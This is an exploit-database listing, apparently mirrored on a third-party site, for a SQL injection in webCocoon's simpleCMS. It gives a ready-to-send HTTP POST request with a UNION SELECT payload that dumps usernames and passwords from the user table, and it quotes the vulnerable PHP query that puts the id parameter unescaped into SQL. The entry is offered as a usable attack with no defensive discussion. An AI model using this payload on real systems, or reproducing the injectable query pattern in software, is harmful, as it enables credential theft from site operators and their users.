[] NeoSense
E X P L O I T S
title author type platform port cve id

webCocoon's simpleCMS - SQL Injection

Author: _ÝNFAZCI_
type: webapps
platform: php
port: 
date_added: 2009-12-20 
date_updated:  
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsimpleCMS.zip
#############################################################
# webCocoon's simpleCMS Vulnerability

# Plugin Home: http://webcocoon.wordpress.com

# Author:_ÝNFAZCI_

# Site: www.1923turk.biz

##############################################################

# Exploit:


Vuln file: /content/post/show.php


Exploit:


POST http://[host]/[path]/index.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

id=xek' union select null,concat_ws(0x3a,username,password),null,null,n  ull,null,null,null,null,null,null,null,null,null,n  ull,null from user -- &mode=post&gfile=show




//Show post
$get_post = mysql_query("SELECT*FROM post WHERE post_id = '$id' AND status = 'published'");
$post_result = mysql_num_rows($get_post);
$post = mysql_fetch_array($get_post);
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.